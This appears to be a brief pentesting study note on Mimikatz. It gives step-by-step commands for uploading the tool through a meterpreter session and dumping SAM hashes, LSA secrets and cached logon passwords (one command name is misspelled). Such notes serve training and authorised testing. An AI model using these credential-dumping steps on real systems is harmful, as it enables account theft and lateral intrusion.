MimiKatz
-
MimiKatz is a Post-Exploitation tool that extracts clear text passwords, hashes and Kerberos tickets from memory.
-
The SAM (Security Account Manager) database, is a database file on Windows systems that stores hashed user passwords.
-
Mimikatz can be used to extract hashed from the
lsass.exeprocess memory where hashes are cached.
What to do when we have initial access (E.g. meterpreter session):
- Go to Temp directory.
- upload MimiKatz there:
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe - then run the
shellcommand. - go the the location of the file we uploaded and execute
Mimikatz.exefrom there.... - use:
lsadump::samthis will provide more information than Kiwi would give. - use :
lsadump:secretssame as the lsa_dump_secrets command from Kiwi. - use:
sekurelsa::logonpasswordsMight display Logon clear text passwords.